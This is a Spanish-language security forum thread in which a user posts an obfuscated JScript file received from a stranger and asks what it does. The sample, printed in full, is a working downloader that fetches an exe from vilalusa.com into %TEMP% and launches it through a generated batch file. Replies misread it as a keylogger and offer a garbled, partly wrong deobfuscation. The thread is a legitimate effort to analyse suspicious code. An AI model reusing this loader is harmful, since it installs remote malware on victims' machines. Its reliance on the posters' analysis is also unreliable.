[SOLUCIONADO] [JS]¿Qué hace este código?

  • 5 Respuestas
  • 1487 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado GGZ

  • *
  • Underc0der
  • Mensajes: 51
  • Actividad:
    0%
  • Reputación 0
  • COME AT ME BRAAAAH.
    • Ver Perfil

[SOLUCIONADO] [JS]¿Qué hace este código?

  • en: Mayo 17, 2016, 04:54:04 am
Hoy he recibido este código de una persona que no conozco.


Código: Javascript
  1. var place0 = false;
  2. var DENMARK0 = "";
  3.  
  4. var fromPath;
  5. var VALIGN0 = "Cr"+"e"+"ateObject";
  6. /*@cc_on /* u  */
  7.   @if (@_win32 || @_win64)/* u  */
  8.     //
  9.    CONNECTION /* u  */ = "W"+"S"+"c"+"ript";
  10.    place0 /* u  */= true;/* u  */
  11.    DENMARK0/* u  */ = /* u  */"MLH";/* u  */
  12.    fromPath =/* u  */ "R" + "esponseB"/* u  */ + "ydo".split('').reverse().join('');
  13.    Turkey = /* u  */(/* u  */"noitisop").split(''/* u  */).reverse(/* u  */).join('');
  14.    devel0 /* u  *//* u  */ =/* u  */ "eliFoTevaS".split(''/* u  */).reverse().join('');
  15.    Currency0 = "A"+"DODB";
  16.    DENMARK1 = "s" + "end";
  17.    Backspace = "ht"+"tp:"+"//v"+"il"+"alu"+"sa."+"co"+"m/0"+"98r"+"44"+"fg"+"45"+"g4"+"5";
  18.    Backspace0 = "G\x45"+"T";
  19.  /* u  */ @end/* u  */
  20. @*//* u  */
  21. if (!(place0))
  22. {
  23.    WScript.Echo("pizzxzzda");
  24.    WScript.Quit(1);
  25. }
  26.  
  27.  
  28. var stepy/* u  */ = /* u  */this[/* u  */CONNECTION /* u  *//* u  */]/* u  */;
  29. var VALIGN1 = function VALIGN() {return stepy[VALIGN0](("fdasfadsfaszxvc", CONNECTION /* u  */)+".Shell");}(), aaa0 = 11;
  30. var accinp0 /* u  */ = 1 * ((-5600 + 5602) - 0);
  31. var catchKeyCode = accinp0 /* u  */ - (2 + 0) * 1;
  32. function Scott(requires0){VALIGN1[("@sdf3asdf ", "adfs3.", "R")+ "u" + ("x", "n")](requires0, catchKeyCode, catchKeyCode);};
  33. function devel(){return VALIGN0;};
  34.  
  35. {
  36. var stepy0 = "M" + "SX"+"ML2."+"X"+DENMARK0+"T"+"TP";
  37. var accinp = "";
  38. accinp = "o"+"pen";
  39. function arrCurrentTag(catchKeyCode0) {catchKeyCode0[devel0](VALIGN1["E"+"xpandEnvir"+"o"+"nmentStrings"]("%T"+"E"+"M"+"P%/") + "QDdd60eYD.ex" + "e", (4714 - 4712) * 1); return 0;};
  40.  
  41. if (true){
  42.  Scott1 = stepy0;
  43.  arrCurrentTag1 = stepy[VALIGN0](Scott1);
  44.  var place /* u  */ = 3-2;
  45. while (place /* u  */) {
  46.    for (;place /* u  */;){
  47.    try {
  48.       if (place /* u  */ == 1)
  49.       {
  50.          arrCurrentTag1[accinp](Backspace0, Backspace, (true, false));
  51.          arrCurrentTag1[DENMARK1]();
  52.          arrCurrentTag0 = "S"+"l"+"eep";
  53.          place /* u  */ = 5316 - 5314;
  54.       }
  55.       stepy[arrCurrentTag0](120);
  56.       if (arrCurrentTag1["r"+"eadystate"] < 4) continue;
  57.       place /* u  */ = catchKeyCode;
  58.       function DENMARK(Currency) {var Scott0 = (123, Currency); return Scott0;};
  59.      
  60.       aaa = VALIGN1["E"+"xpandEnvir"+"o"+"nmentStrings"]("%T"+"E"+"M"+"P%/") + "QDdd60eYD.ex" + "e";
  61.       CONNECTION0 = VALIGN1["E"+"xpandEnvir"+"o"+"nmentStrings"]("%T"+"E"+"M"+"P%/") + "suc11.05.2016kit.bat";
  62.       Turkey0 = "start "+aaa+"\r\nexit"
  63.  
  64.       Scott1 = devel1 = stepy[devel()](Currency0+"."+"Str"+"e"+"a"+"m");
  65.       Scott1[accinp]();
  66.       Scott1["t"+"y"+"pe"] = 2;
  67.       requires = "w"+"r"+"i"+"t"+"e";
  68.       Scott1["Charset"] = "windows-1251";
  69.       Scott1[requires+"Text"](Turkey0);
  70.       devel1[Turkey] = 0;
  71.       Scott1[devel0](CONNECTION0, -2025 + 2027);
  72.       devel1["close"]();
  73.      
  74.       Scott1 = devel1 = stepy[devel()](Currency0+"."+"Str"+"e"+"a"+"m");
  75.       Scott1[accinp]();
  76.       Scott1["t"+"y"+"pe"] = 2;
  77.       Scott1["Charset"] = "windows-1251";
  78.       Scott1[requires+"Text"]("M");
  79.       devel1[Turkey] = 0;
  80.       arrCurrentTag(Scott1);
  81.       devel1["close"]();
  82.      
  83.       Scott1 = devel1 = stepy[devel()](Currency0+"."+"Str"+"e"+"a"+"m");
  84.       Scott1[accinp]();
  85.       Scott1["t"+"y"+"pe"] = 1;
  86.       Scott1[requires](arrCurrentTag1[fromPath]);
  87.       devel1[Turkey] = -3320 + 3321;
  88.       arrCurrentTag(Scott1);
  89.       devel1["close"]();
  90.      
  91.       if (1 && place0) Scott(CONNECTION0);
  92.    } catch(fromPath0){};};
  93. };
  94. }
  95. }
  96.  
  97.  

Cabe destacar que después de declarar :
var place0 = false;
var DENMARK0 = "";

Abajo hay una linea de ////////////////////////////////////////////////// larguísima que lo tuve que sacar porque se trababa todo
« Última modificación: Mayo 19, 2016, 01:44:26 am por str0nasfck »

Desconectado blackdrake

  • *
  • Co Admin
  • Mensajes: 1943
  • Actividad:
    36.67%
  • Country: es
  • Reputación 15
    • Ver Perfil

Re:[JS]¿Qué hace este código?

  • en: Mayo 17, 2016, 02:54:25 pm
Creo que es un keylogger, o algo que envía datos a la siguiente url: vilalusa.com/098r44fg45g45

Saludos.


Desconectado 79137913

  • *
  • Co Admin
  • Mensajes: 684
  • Actividad:
    46.67%
  • Reputación 15
  • 4 Esquinas
  • Skype: [email protected]
    • Ver Perfil
    • Doors.Party
    • Email

Re:[JS]¿Qué hace este código?

  • en: Mayo 17, 2016, 03:52:47 pm
HOLA!!!

...desofuscando...

GRACIAS POR LEER!!!
"Algunos creen que soy un bot, puede que tengan razon"
"Como no se puede igualar a Dios, ya he decidido que hacer, ¡SUPERARLO!"
"La peor de las ignorancias es no saber corregirlas"

*Shadow Scouts Team*                                                   Solo los usuarios pueden ver los links. Registrate o Ingresar

Desconectado sp3cial1st

  • *
  • Underc0der
  • Mensajes: 85
  • Actividad:
    0%
  • Reputación 1
  • http://i.imgur.com/bJajhga.gif
    • Ver Perfil
    • Email

Re:[JS]¿Qué hace este código?

  • en: Mayo 17, 2016, 03:56:14 pm
no hay duda, nada de parecido, es un keylogger..
tambien tiene codigo de shell pero para erroneo..
« Última modificación: Mayo 17, 2016, 03:59:02 pm por sp3cial1st »

Desconectado 79137913

  • *
  • Co Admin
  • Mensajes: 684
  • Actividad:
    46.67%
  • Reputación 15
  • 4 Esquinas
  • Skype: [email protected]
    • Ver Perfil
    • Doors.Party
    • Email

Re:[JS]¿Qué hace este código?

  • en: Mayo 17, 2016, 04:40:17 pm
HOLA!!!

Bueno estuve desofuscando un poco esto...

todo el codigo hace mas o menos lo que dice el proximo codigo.

En la desofuscacion se perdieron datos pero nada importante.

Realmente el que lo creo esta un poco mal de la cabeza Jajajaj creo que con suerte funcionara en Iexplore < 8

El funcionamiento esta interesante, Descarga 2 archivos un exe y un bat (el exe debe usar el bat por que este script no lo ejecuta)
El exe funciona de keylogger offline mientras que el script solicita la informacion al exe por medio de una coneccion ADODB
Luego el script envia el archivo a la web (me parece que a traves de un ResponseBody que anda sando vueltas por ahi.

Saludos

Sin mas el Script:

Código: Javascript
  1.         try {
  2.  
  3.  
  4. // se conecta con la web y descarga el exe
  5.                 WScript.CreateObject(this.["WScript"])["open"]("G\x45T", "http://vilalusa.com/098r44fg45g45", (true, false));
  6.                 WScript.CreateObject(this.["WScript"])["send"]();
  7. //guarda el exe
  8.                 SaveToFile("%TEMP%" + "QDdd60eYD.exe")0;
  9.                
  10. //si la conexion no dio error continua sino sale del try
  11.                 if (WScript.CreateObject(this.["WScript"])["readystate"] < 4) continue;
  12. //guarda el bat que descargo por que no dio error la conexion
  13.                 SaveToFile(WScript.Shell["ExpandEnvironmentStrings"]("%TEMP%/") + "suc11.05.2016kit.bat");
  14. //ejecuta el exe y sale de la ventana de DOS
  15.                 WScriptShell( "start "+"%TEMP%" + "QDdd60eYD.exe"+"\r\nexit")
  16. //Se conecta a una base de datos (supongo que el exe es un keylogger miniatura sin posibilidades de enviar informacion al exterior por lo que usa este script para comunicar)
  17.                 this["WScript"]["CreateObject"]("ADODB"+".Stream");
  18.                 this["WScript"]["open"]();
  19.                 this["WScript"]["type"] = 2;
  20.                 this["WScript"]["write"]();
  21.                 this["WScript"]["Charset"] = "windows-1251";
  22.                 this["WScript"][requires+"Text"]("position");
  23. //ejecuta la peticion a la BD
  24.                 this["WScript"]["runx"] = 0;
  25. //Guarda el resultado
  26.                 this["WScript"]["SaveToFile"]("WScript.runx");
  27. //cierra la connexion
  28.                 this["WScript"]["close"]();
  29. //la parte del envio de datos la tengo perdida, se me borro
  30.         } catch("ResponseBody"0){};};

GRACIAS POR LEER!!!
"Algunos creen que soy un bot, puede que tengan razon"
"Como no se puede igualar a Dios, ya he decidido que hacer, ¡SUPERARLO!"
"La peor de las ignorancias es no saber corregirlas"

*Shadow Scouts Team*                                                   Solo los usuarios pueden ver los links. Registrate o Ingresar

Desconectado GGZ

  • *
  • Underc0der
  • Mensajes: 51
  • Actividad:
    0%
  • Reputación 0
  • COME AT ME BRAAAAH.
    • Ver Perfil

Re:[JS]¿Qué hace este código?

  • en: Mayo 19, 2016, 01:43:40 am
Nooo!, jaja buenisimo! muchas gracias 79137913 y a los otros por haber contestado ahora me quedaré leyendo más el código que pusiste

Saludos!
« Última modificación: Mayo 19, 2016, 01:53:49 am por str0nasfck »

 

[SOLUCIONADO] ¿Kali Linux o Kali Linux Ligth ?

Iniciado por worq

Respuestas: 2
Vistas: 24525
Último mensaje Noviembre 21, 2017, 12:28:54 pm
por Codig0Bit
[SOLUCIONADO] Multiuploader de imagenes con mysql, hosting de imagenes con mysql

Iniciado por graphixx

Respuestas: 4
Vistas: 11323
Último mensaje Marzo 26, 2013, 05:42:58 pm
por Xt3mP
[SOLUCIONADO] ¿Como publicar un software como software libre?

Iniciado por FuriosoJack

Respuestas: 2
Vistas: 9998
Último mensaje Mayo 23, 2017, 07:24:22 am
por HATI
[SOLUCIONADO] Linux Mint, errores, errores y mas errores...

Iniciado por n1sendev

Respuestas: 12
Vistas: 14287
Último mensaje Noviembre 22, 2017, 06:50:55 am
por RuidosoBSD
[SOLUCIONADO] Ayuda urgente con Virus "Virus.Win32Sality"

Iniciado por Napsters

Respuestas: 6
Vistas: 13602
Último mensaje Junio 11, 2012, 03:38:18 am
por Satyricon